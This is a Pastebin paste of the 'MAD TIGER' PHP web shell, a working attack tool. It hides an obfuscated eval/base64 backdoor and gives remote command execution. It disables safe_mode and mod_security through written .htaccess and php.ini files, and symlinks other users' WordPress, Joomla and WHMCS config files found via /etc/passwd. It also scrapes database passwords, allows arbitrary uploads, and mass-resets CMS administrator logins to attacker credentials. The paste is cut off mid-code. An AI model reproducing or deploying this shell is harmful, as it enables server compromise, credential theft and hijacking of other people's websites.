madtiger

selim

Dec 1st, 2018
313
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.76 KB | None | 0 0
  1. <php? ?>
  2. <?php
  3. if(isset($_GET["mad"])&&$_GET["mad"]=="Symlink Config"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("");exit;}?>
  4.  
  5. <html>
  6. <head>
  7.  
  8. <title>[[BGHH//MAD TIGER]]</title>
  9. <link rel="icon" href="http://i45.tinypic.com/autnvp.png">
  10.  
  11. <style type="text/css">
  12.  
  13.  
  14.  
  15. body{
  16. background: #222;
  17. }
  18. .form{
  19. background: #333;
  20. text-align: center;
  21. height: 430px;
  22. border:1px solid #F00;
  23. border-radius: 9px;
  24. margin-left: 24%;
  25. }
  26. input,textarea{
  27. background: rgb(136, 160, 141);
  28. padding: 5px;
  29. border:1px solid #F00;
  30. border-radius: 20px;
  31. transition:border 1s;
  32. }
  33. input:focus,textarea:focus{
  34. border: 1px solid red;
  35. }
  36. .scan{
  37. width: 120px;
  38. border-radius: 20px;
  39. background: #0047B2;
  40. opacity: 0.5;
  41. transition:opacity 1s;
  42. }
  43. .scan:hover{
  44. opacity: 1.0
  45. }
  46. .error{
  47. font-size: 17px;
  48. color:red;
  49. text-shadow: 1px 1px 5px,0 0 25px;
  50. }
  51. .found{
  52. font-size: 17px;
  53. color:green;
  54. text-shadow: 1px 1px 5px,0 0 25px;
  55. }
  56. hr{
  57. color:red;
  58. box-shadow: 1px 2px 3px,0 0 25px;
  59. }
  60. p,a{
  61. text-decoration: none;
  62. color:red;
  63. font-size: 14px;
  64. direction: rtl;
  65. }
  66. </style>
  67.  
  68. <center><hr>
  69. <form method='GET'>
  70.  
  71. <input type='submit' name='tool' value='Safe Mode' size='10' >
  72. <input type='submit' name='tool' value='Execute' size='10' >
  73. <input type='submit' name='tool' value='Config Killer' size='10' >
  74. <input type='submit' name='tool' value='Symlink' size='10' >
  75. <input type='submit' name='tool' value='Symlink2' size='10' >
  76. <input type='submit' name='mad' color='green' value='Symlink Config' href='/mina1.php' size='10' >
  77. <input type='submit' name='tool' value='Jumping' size='10' >
  78. <input type='submit' name='tool' value='Pass Config' size='10' >
  79. <input type='submit' name='tool' value='Upload' size='10' >
  80. <input type='submit' name='tool' value='Wordpress Mass' size='10' >
  81. <input type='submit' name='tool' value='Joomla Mass' size='10' >
  82. <input type='submit' name='tool' value='Server Info' size='10' >
  83. <input type='submit' name='tool' value='About' size='10' >
  84. <h2><font color=green>We are Bangladeshi Hacker :p<br>
  85.  
  86.  
  87. </h2>
  88.  
  89. </form>
  90. <hr>
  91. <?php
  92. $x73 = "basename";
  93. $x74 = "chdir";
  94. $x75 = "copy";
  95. $x76 = "error_reporting";
  96. $x77 = "eregi";
  97. $x78 = "ereg";
  98. $x79 = "explode";
  99. $x7a = "fclose";
  100. $x7b = "file_get_contents";
  101. $x7c = "file_put_contents";
  102. $x7d = "file";
  103. $x7e = "flush";
  104. $x7f = "fileowner";
  105. $x80 = "fopen";
  106. $x81 = "fwrite";
  107. $x82 = "function_exists";
  108. $x83 = "getcwd";
  109. $x84 = "ini_restore";
  110. $x85 = "ini_get";
  111. $x86 = "is_file";
  112. $x87 = "mail";
  113. $x88 = "mkdir";
  114. $x89 = "mysql_connect";
  115. $x8a = "mysql_fetch_array";
  116. $x8b = "mysql_query";
  117. $x8c = "mysql_select_db";
  118. $x8d = "phpversion";
  119. $x8e = "posix_getpwuid";
  120. $x8f = "preg_match_all";
  121. $x90 = "preg_match";
  122. $x91 = "rand";
  123. $x92 = "set_time_limit";
  124. $x93 = "shell_exec";
  125. $x94 = "strlen";
  126. $x95 = "symlink";
  127. $x96 = "system";
  128. $x97 = "trim";
  129. $x92(0);
  130. $x76(0);
  131. ///Safe Mode
  132. if ($_REQUEST['tool'] == "Safe Mode") {
  133. echo '<h3>[ <font color="red">!</font> ] Safe Mode Fucker [<font color="red">!</font> ]</h3>
  134. <br><form method="POST" action="">
  135. <select name="way">
  136. <option>php.ini</option>
  137. <option>ini.php</option>
  138. <option>htaccess</option>
  139. </select><input name="bypass" type="submit" value="Bypass Using"><br>';
  140. if ($_POST['way'] == "htaccess") {
  141. x0b();
  142. } elseif ($_POST['way'] == "php.ini") {
  143. x0c();
  144. } elseif ($_POST['way'] == "ini.php") {
  145. x0d();
  146. }
  147. }
  148. function x0b() {
  149. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  150. $x2f = $x80($x83() . $x30 . "/.htaccess", "w");
  151. $x81($x2f, "Options +FollowSymLinks
  152. DirectoryIndex india.htm
  153.  
  154. Options All Indexes
  155. <IfModule mod_security.c>
  156. SecFilterEngine Off
  157. SecFilterScanPOST Off
  158.  
  159. SecFilterCheckURLEncoding Off
  160. SecFilterCheckCookieFormat Off
  161. SecFilterCheckUnicodeEncoding Off
  162. SecFilterNormalizeCookies Off
  163. </IfModule>
  164. SetEnv PHPRC " . $x83() . $x30 . "/php.ini
  165. suPHP_ConfigPath " . $x83() . $x30 . "/php.ini");
  166. $x7a($x2f);
  167. if ($x86($x83() . $x30 . "/.htaccess")) {
  168. echo "<Span style='color:green;'><strong>.htaccess Created successfully</strong></span><br>";
  169. } else {
  170. echo "<strong><Span style='color:red;'>I can not create .htaccess</strong></span><br>";
  171. };
  172. }
  173. function x0c() {
  174. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  175. $x31 = $x80($x83() . $x30 . "/php.ini", "w");
  176. $x81($x31, "safe_mode = Off
  177. disable_functions = NONE
  178. safe_mode_gid = OFF
  179.  
  180. open_basedir = OFF");
  181. $x7a($x31);
  182. if ($x86($x83() . $x30 . "/php.ini")) {
  183. echo "<strong><Span style='color:green;'>php.ini Created successfully</strong></span><br>";
  184. } else {
  185. echo "<strong><Span style='color:red;'>I can not create php.ini</strong></span><br>";
  186. };
  187. }
  188. function x0d() {
  189. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  190. $x32 = $x80($x83() . $x30 . "/ini.php", "w");
  191. $x81($x32, '$x84("safe_mode");
  192. $x84("open_basedir");');
  193. $x7a($x32);
  194. if ($x86($x83() . $x30 . "/ini.php")) {
  195. echo "<strong><Span style='color:green;'>ini.php Created successfully</strong></span><br>";
  196. } else {
  197. echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>";
  198. };
  199. }
  200. ////Config Killer
  201. if ($_REQUEST['tool'] == "Config Killer") {
  202. echo "<br><center><h6>Config Grabber</h6>"; ?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt"></p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo $x7b('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="GET Config" type="submit"><br></form></center><br><?php
  203. }
  204. if ($_POST['config']) {
  205. $x33 = $x34 = @$x85("disable_functions");
  206. if ($x77("symlink", $x34)) {
  207. die('<error>Symlink is disabled :( </error>');
  208. }
  209. @$x88('mad-tiger', 0755);
  210. @$x74('mad-tiger');
  211. $x2f = "
  212.  
  213. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  214.  
  215. Options Indexes FollowSymLinks
  216. ForceType text/plain
  217. AddType text/plain .php
  218.  
  219. AddType text/plain .html
  220.  
  221. AddType text/html .shtml
  222. AddType txt .php
  223. AddHandler server-parsed .php
  224.  
  225. AddHandler txt .php
  226.  
  227. AddHandler txt .html
  228.  
  229. AddHandler txt .shtml
  230.  
  231. Options All
  232. Options All";
  233. $x7c(".htaccess", $x2f, FILE_APPEND);
  234. $x35 = $_POST["passwd"];
  235. $x35 = $x79("
  236. ", $x35);
  237. echo "<br><br><center><font color=#b0b000 size=2pt>Loading.....</center><br>";
  238. foreach ($x35 as $x36) {
  239. $x37 = $x79(":", $x36);
  240. $x38 = $x37[0];
  241. @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt');
  242. @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt');
  243. @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt');
  244. @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt');
  245. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt');
  246. @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt');
  247. @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt');
  248. @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  249. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  250. @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt');
  251. @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt');
  252. @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt');
  253. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt');
  254. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt');
  255. @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt');
  256. @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt');
  257. @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt');
  258. @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt');
  259. @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt');
  260. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt');
  261. @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt');
  262. @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt');
  263. @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt');
  264. @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt');
  265. @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt');
  266. @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt');
  267. @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt');
  268. @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt');
  269. @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt');
  270. @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt');
  271. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt');
  272. @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt');
  273. @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt');
  274. @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt');
  275. @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt');
  276. @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt');
  277. @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt');
  278. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt');
  279. @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt');
  280. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt');
  281. }
  282. echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>[Grabbered] -></b> <a target="_blank" href="mad-tiger">Open configs</a></font></b>';
  283. }
  284. }
  285. ////Symlink
  286. if ($_REQUEST['tool'] == "Symlink") {
  287. echo "<h6>Symlink Bypass </h6>";
  288. echo '<form action="" method="post">';
  289. @$x92(0);
  290. echo "<center>";
  291. @$x88('mad-tiger', 0777);
  292. $x2f = "Options all
  293. DirectoryIndex readme.html
  294. AddType text/plain .php
  295. AddHandler server-parsed .php
  296. AddType text/plain .html
  297. AddHandler txt .html
  298. Require None
  299. Satisfy Any";
  300. $x26 = @$x80('mad-tiger/.htaccess', 'w');
  301. $x81($x26, $x2f);
  302. @$x95('/', 'mad-tiger/root');
  303. $x27 = $x73('index.php');
  304. $x28 = @$x7d('/etc/named.conf');
  305. if (!$x28) {
  306. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  307. } else {
  308. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  309. foreach ($x28 as $x29) {
  310. if ($x77('zone', $x29)) {
  311. $x8f('#zone "(.*)"#', $x29, $x2a);
  312. $x7e();
  313. if ($x94($x97($x2a[1][0])) > 2) {
  314. $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0]));
  315. $x2c = $x2b['name'];
  316. @$x95('/', 'mad-tiger/root');
  317. $x2c = $x2a[1][0];
  318. $x2d = '\.ir';
  319. $x2e = '\.il';
  320. $x1e = '\.id';
  321. $x1f = '\.sg';
  322. $x20 = '\.edu';
  323. $x21 = '\.gov';
  324. $x22 = '\.go';
  325. $x23 = '\.gob';
  326. $x24 = '\.mil';
  327. $x25 = '\.mi';
  328. if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) {
  329. $x2c = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>';
  330. }
  331. echo "
  332. <tr>
  333. <td>
  334. <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
  335. </td>
  336. <td>
  337. ' . $x2b['name'] . "
  338. </td>
  339.  
  340. <td>
  341. <a href='mad-tiger/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
  342. </td>
  343. </tr></div> ";
  344. }
  345. }
  346. }
  347. }
  348. echo "</table>";
  349. }
  350. ////Jumping
  351. if ($_REQUEST['tool'] == "Jumping") {
  352. $x26 = "array_push";
  353. $x27 = "feof";
  354. $x28 = "fgets";
  355. $x29 = "fopen";
  356. $x2a = "ini_get";
  357. $x2b = "is_readable";
  358. $x2c = "set_time_limit";
  359. $x2d = "strpos";
  360. $x2e = "substr";
  361. ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>');
  362. $x2c(0);
  363. @$x30 = $x29('/etc/passwd', 'r');
  364. if (!$x30) {
  365. die('<b><font face=Verdana size=2 color=red> Error : Can Not Read Config Of Server </b>');
  366. }
  367. $x31 = array();
  368. $x32 = array();
  369. $x33 = array();
  370. $x34 = 0;
  371. echo "<b><font face=Verdana size=13 color=Teal> </font></b><br />";
  372. echo "<br />";
  373. echo "<font face=Verdana size=17 color=green> Ok, Let's Begin ... </font><br />";
  374. echo "<font face=Verdana size=2 color=Teal>*********************************************</font><br />";
  375. while (!$x27($x30)) {
  376. $x35 = $x28($x30);
  377. if ($x34 > 35) {
  378. $x36 = $x2d($x35, ':');
  379. $x37 = $x2e($x35, 0, $x36);
  380. $x38 = '/home/' . $x37 . '/public_html/';
  381. if (($x37 != '')) {
  382. if ($x2b($x38)) {
  383. $x26($x32, $x37);
  384. $x26($x31, $x38);
  385. echo "<font face=Verdana size=2 color=Red>[Found !] $x38</font>";
  386. echo "<br/>";
  387. }
  388. }
  389. }
  390. $x34++;
  391. }
  392. echo "<font face=Verdana size=2 color=Teal>*********************************************</font><br />";
  393. echo "<br />";
  394. echo "<font face=Verdana size=2 color=Maroon>Thanks For Using This Simple Tools. ^_^</font><br />";
  395. echo "<font face=Verdana size=2></font>";
  396. echo "<font face=Verdana size=2></font>";
  397. }
  398. /////Get Password in Config
  399. if ($_REQUEST['tool'] == "Pass Config") {
  400. echo '<form method="post">
  401. <input type="text" name="conf" value="" />
  402. <input type="submit" value="GeT Passwords" name="get" />
  403. </form>';
  404. $x39 = $_POST['get'];
  405. $x3a = $_POST['conf'];
  406. //////////////////////////////////////////////////////////////////////////////////////////////
  407. if (isset($x39) && $x3a != "") {
  408. $x3b = @$x7b($x3a);
  409. //$x8f('#href="(.*?)">(.*?)<#',$x3b,$x3c); // $x3c[2]
  410. $x8f('#href="(.*?)"#', $x3b, $x3c);
  411. foreach ($x3c[1] as $x3d) {
  412. $x3e = $x3a . $x3d;
  413. $x3f = @$x7b($x3e);
  414. $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); // wordpress
  415. $x90('#password = \'(.*)\'#', $x3f, $x41); // joomla
  416. $x90('#password\'] = \'(.*)\'#', $x3f, $x42); // vb
  417. $x90('#db_password = "(.*)"#', $x3f, $x43); // whmcs
  418. $x90('#db_password = \'(.*)\'#', $x3f, $x43); // whmcs
  419. $x90('#dbpass = "(.*)"#', $x3f, $x44); //
  420. $x90('#password = \'(.*)\'#', $x3f, $x45); // connnect.php
  421. $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); // phpBB 3.0.x
  422. $x90('#password_localhost = "(.*)"#', $x3f, $x47); // conexao.php
  423. $x90('#senha = "(.*)"#', $x3f, $x48); // /_inc/config.inc.php
  424. if (!empty($x40[1])) {
  425. echo $x40[1] . "<br>";
  426. } elseif (!empty($x41[1])) {
  427. echo $x41[1] . "<br>";
  428. } elseif (!empty($x42[1])) {
  429. echo $x42[1] . "<br>";
  430. } elseif (!empty($x43[1])) {
  431. echo $x43[1] . "<br>";
  432. } elseif (!empty($x44[1])) {
  433. echo $x44[1] . "<br>";
  434. } elseif (!empty($x45[1])) {
  435. echo $x45[1] . "<br>";
  436. } elseif (!empty($x49[1])) {
  437. echo $x49[1] . "<br>";
  438. } elseif (!empty($x46[1])) {
  439. echo $x46[1] . "<br>";
  440. } elseif (!empty($x47[1])) {
  441. echo $x47[1] . "<br>";
  442. } elseif (!empty($x48[1])) {
  443. echo $x48[1] . "<br>";
  444. }
  445. }
  446. }
  447. }
  448. /////upload
  449. if ($_REQUEST['tool'] == "Upload") {
  450. echo "<br><br><form method=post enctype=multipart/form-data>";
  451. echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
  452. if ($_POST["v"] == up) {
  453. if (@$x75($x4a["f"]["tmp_name"], $x4a["f"]["name"])) {
  454. echo "<h3><b>Uploaded Done</b>-->" . $x4a["f"]["name"] . "</h3>";
  455. } else {
  456. echo "<b>Not Uploaded";
  457. }
  458. }
  459. }
  460. //////Execute
  461. if ($_REQUEST['tool'] == "Execute") {
  462. echo '<form method="post">
  463. <input name="cmd" />
  464. <input type="submit" name="go" />
  465. </form>';
  466. if ($_POST['go']) {
  467. $x4b = $x82("system");
  468. $x4c = $x82("passthru");
  469. $x4d = $x82("shell_exec");
  470. if ($x4b) {
  471. echo "<textarea readonly='' cols='90'rows='20'>";
  472. echo $x96($_POST['cmd']);
  473. echo '</textarea>';
  474. }
  475. if (!$x4b & $x4c) {
  476. echo "<textarea readonly='' cols='90'rows='20'>";
  477. echo passthrsu($_POST['cmd']);
  478. echo '</textarea>';
  479. }
  480. if (!$x4b & !$x4c & $x4d) {
  481. echo "<textarea readonly='' cols='90'rows='20'>";
  482. echo $x93($_POST['cmd']);
  483. echo '</textarea>';
  484. }
  485. }
  486. }
  487. //// Symlink2
  488. if ($_REQUEST['tool'] == "Symlink2") {
  489. echo '
  490.  
  491. <FORM ACTION="#" METHOD="POST">
  492. <br>
  493. <br>
  494. <center> <font size="2" face="MV Boli" color=rgba(82, 168, 236, 0.8) >File :</font> <INPUT TYPE="text" NAME="user" SIZE=60><INPUT TYPE="submit" VALUE="Sym"> </center>
  495. </FORM>';
  496. $x4e = $_POST["user"];
  497. $x4f = '' . $x91() . '.txt';
  498. if ($x4e) {
  499. $x50 = $x91();
  500. @$x88($x50);
  501. $x51 = $x50 . "/.htaccess";
  502. $x52 = $x80($x51, 'w') or die("Error: Can't open file");
  503. $x53 = 'Options +Indexes
  504. ReadMeName ' . $x4f;
  505. $x81($x52, $x53);
  506. $x7a($x52);
  507. $x74($x50);
  508. $x95($x4e, $x4f);
  509. $x74("../");
  510. echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>";
  511. }
  512. }
  513. /////About
  514. if ($_REQUEST['tool'] == "About") {
  515. echo '
  516. <img src="https://c1.staticflickr.com/7/6222/6285753717_7eb8c11b29_b.jpg" width="1120" height="500" />
  517. <h5> We are BGHH<br>
  518.  
  519. </h5>
  520.  
  521. ';
  522. }
  523. ////Server Info
  524. if ($_REQUEST['tool'] == "Server Info") {
  525. function openBaseDir() {
  526. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  527. $x54 = $x85("open_basedir");
  528. if (!$x54) {
  529. $x54 = '<font color="green">OFF</font>';
  530. } else {
  531. $x54 = '<font color="red">ON</font>';
  532. }
  533. return $x54;
  534. }
  535. echo '
  536.  
  537. <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
  538. <td height="100" align="left" class="td1">';
  539. $x55 = $x73('index.php');
  540. $x56 = @$x85('safe_mode');
  541. $x3a = @$x83();
  542. echo "Server :&nbsp;<font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
  543. echo "PHP version : <b><font color=green>" . @$x8d() . "</font></b><br />";
  544. echo (($x56) ? ("safe_mode &nbsp;: <b><font color=red>ON</font></b>") : ("safe_mode: <b><font color=green>OFF</font></b>"));
  545. echo "<br />disable_functions : ";
  546. if ('' == ($x57 = @$x85('disable_functions'))) {
  547. echo "<font color=green>NONE</font></b><br>";
  548. } else {
  549. echo "<font color=red>$x57</font></b><br />";
  550. }
  551. echo "Open_Basedir: " . openBaseDir() . "<br />";
  552. echo "Pwd : <font color=green><b>" . $x3a . "</font></b><br />";
  553. }
  554. /////Wordpress Mass
  555. if ($_REQUEST['tool'] == "Wordpress Mass") {
  556. echo '<form method="post">
  557. <textarea name="sites" cols="70" rows="12" placeholder="http://www.site.com/sym/wp-config.txt"></textarea><br>
  558. <input name="change" value="Change" type="submit"/>
  559. </form>';
  560. ///////////////////////////////
  561. $x58 = $_POST['sites'];
  562. $x59 = $_POST['change'];
  563. //////////////////////////////////////////////////////////////////////
  564. if (isset($x59) && $x58 != "") {
  565. $x5a = $x79("
  566. ", $x58);
  567. foreach ($x5a as $x5b) {
  568. $x5b = $x97($x5b);
  569. $x3b = @$x7b($x5b);
  570. if ($x90("#DB_USER#i", $x3b)) {
  571. $x90("#'DB_HOST', '(.*?)'#i", $x3b, $x5c);
  572. $x90("#'DB_USER', '(.*?)'#i", $x3b, $x5d);
  573. $x90("#'DB_PASSWORD', '(.*?)'#i", $x3b, $x5e);
  574. $x90("#'DB_NAME', '(.*?)'#i", $x3b, $x5f);
  575. $x90("#table_prefix = '(.*)'#i", $x3b, $x60);
  576. $x61 = @$x89($x5c[1], $x5d[1], $x5e[1]);
  577. if ($x61) {
  578. $x62 = @$x8c($x5f[1], $x61);
  579. if ($x62) {
  580. $x63 = @$x8b("UPDATE " . $x60[1] . "users SET `user_login` ='magico' WHERE ID = 1");
  581. $x63 = @$x8b("UPDATE " . $x60[1] . "users SET `user_pass` ='ad288af4a9ad4a55a9a939e984f23a18' WHERE ID = 1");
  582. if ($x63) {
  583. $x64 = @$x8b("SELECT * from " . $x60[1] . "options WHERE option_name='siteurl'");
  584. $x65 = @$x8a($x64);
  585. $x66 = $x65["option_value"];
  586. echo "----------------------------------------------------------------------------------------------------------------------<br>";
  587. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
  588. echo "<span style=\"color: rgb(0, 153, 0); font-weight: bold;\">[#] </span><span style=\"color: rgb(51, 204, 0); font-weight: bold;\">$x3d[2] :</span>" . " " . "[User]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">magico </span>[Pass]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">xmagico </span>:" . " " . "[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"$x66/wp-login.php\">$x66/wp-login.php</a></span><br>";
  589. } //end if
  590. else {
  591. $x64 = @$x8b("SELECT * from `wp_options` WHERE option_name='siteurl'");
  592. $x65 = @$x8a($x64);
  593. $x66 = $x65["option_value"];
  594. echo "----------------------------------------------------------------------------------------------------------------------<br>";
  595. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
  596. echo "-----------------------------------------------------------------------------------------------<br>";
  597. echo "<span style=\"color: red; font-weight: bold;\">[!] $x3d[2] : Error query" . " " . "</span><br>";
  598. }
  599. } /*end if*/
  600. else {
  601. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x67);
  602. echo "-----------------------------------------------------------------------------------------------<br>";
  603. echo "<span style=\"color: red; font-weight: bold;\">[!] $x67[2]: ERRoR query</span><br>";
  604. }
  605. } /*end if*/
  606. else {
  607. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x68);
  608. echo "-----------------------------------------------------------------------------------------------<br>";
  609. echo "<span style=\"color: red; font-weight: bold;\">[!] $x68[2] : [!]can't select the database</span><br>";
  610. }
  611. } /*end if*/
  612. else {
  613. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x69);
  614. echo "-----------------------------------------------------------------------------------------------<br>";
  615. echo "<span style=\"color: red; font-weight: bold;\">[!] $x69[2] : [!]can't connect to the database</span><br>";
  616. }
  617. /////////////////////////////////////
  618.  
  619. } //end foreach
  620.  
  621. } //endif
  622.  
  623. }
  624. //////Joomla Mass
  625. if ($_REQUEST['tool'] == "Joomla Mass") {
  626. echo '<form method="post">
  627. <textarea name="sites" cols="70" rows="12" placeholder="http://www.site.com/sym/jo-config.txt"></textarea><br>
  628. <input name="change" value="Change" type="submit"/>
  629. </form>';
  630. ///////////////////////////////
  631. $x58 = $_POST['sites'];
  632. $x59 = $_POST['change'];
  633. //////////////////////////////////////////////////////////////////////
  634. if (isset($x59) && $x58 != "") {
  635. $x5a = $x79("
  636. ", $x58);
  637. foreach ($x5a as $x5b) {
  638. $x5b = $x97($x5b);
  639. $x3b = @$x7b($x5b);
  640. if ($x90("#class JConfig#i", $x3b)) {
  641. $x90('#\$x6a = \'(.*?)\'#i', $x3b, $x5c);
  642. $x90('#\$x38 = \'(.*?)\'#i', $x3b, $x5d);
  643. $x90('#\$x6b = \'(.*?)\'#i', $x3b, $x5e);
  644. $x90('#\$x62 = \'(.*?)\'#i', $x3b, $x5f);
  645. $x90('#\$x6c = \'(.*?)\'#i', $x3b, $x6c);
  646. $x90("#fromname = '(.*?)'#i", $x3b, $x6d); // get joomla url
  647. $x90("#mailfrom = '(.*?)@(.*?)'#i", $x3b, $x6e); //get joomla url
  648. $x61 = @$x89($x5c[1], $x5d[1], $x5e[1]);
  649. if ($x61) {
  650. $x62 = @$x8c($x5f[1], $x61);
  651. if ($x62) {
  652. $x63 = @$x8b("UPDATE " . $x6c[1] . "users SET username ='magico' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
  653. if ($x63) {
  654. echo "----------------------------------------------------------------------------------------------------------------------<br>";
  655. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
  656. echo "<span style=\"color: rgb(0, 153, 0); font-weight: bold;\">[#] </span><span style=\"color: rgb(51, 204, 0); font-weight: bold;\">$x3d[2] :</span>" . " " . "[User]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">magico </span>[Pass]= <span style=\"color: rgb(153, 153, 0); font-weight: bold;\">123456789 </span>:" . " " . "[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"http://$x6d[1]/administrator\">$x6d[1] </a></span>.[site]<span style=\"color: rgb(204, 51, 204); font-weight: bold;\"> <a href=\"http://$x6e[2]/administrator\">$x6e[2]</a></span> <br>";
  657. } //end if
  658. else {
  659. echo "----------------------------------------------------------------------------------------------------------------------<br>";
  660. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x3d);
